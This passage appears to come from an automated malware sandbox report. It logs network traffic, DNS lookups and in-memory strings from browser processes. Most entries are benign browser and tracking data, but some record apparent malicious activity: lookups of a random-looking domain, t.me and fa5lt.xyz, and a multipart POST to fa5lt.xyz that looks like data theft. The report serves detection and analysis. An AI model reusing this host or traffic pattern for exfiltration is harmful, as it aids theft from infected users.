                Source: global trafficHTTP traffic detected: GET /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10F921920583e33615b2b9d1735307250; XID=10F921920583e33615b2b9d1735307250
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; SM=T
                Source: 6d4ecc2d-82ed-48b8-8605-a534cd846610.tmp.22.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log1.22.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log1.22.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log1.22.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000003.2627940150.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627818078.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2628005610.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000010.00000003.2627940150.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627818078.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2628005610.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmetadatade equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: BjQpTJiVkzRqS.BjQpTJiVkzRqS
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: fa5lt.xyz
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: fa5lt.xyzContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970e-data
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384P
                Source: chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722V
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901/
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371e
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535V
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
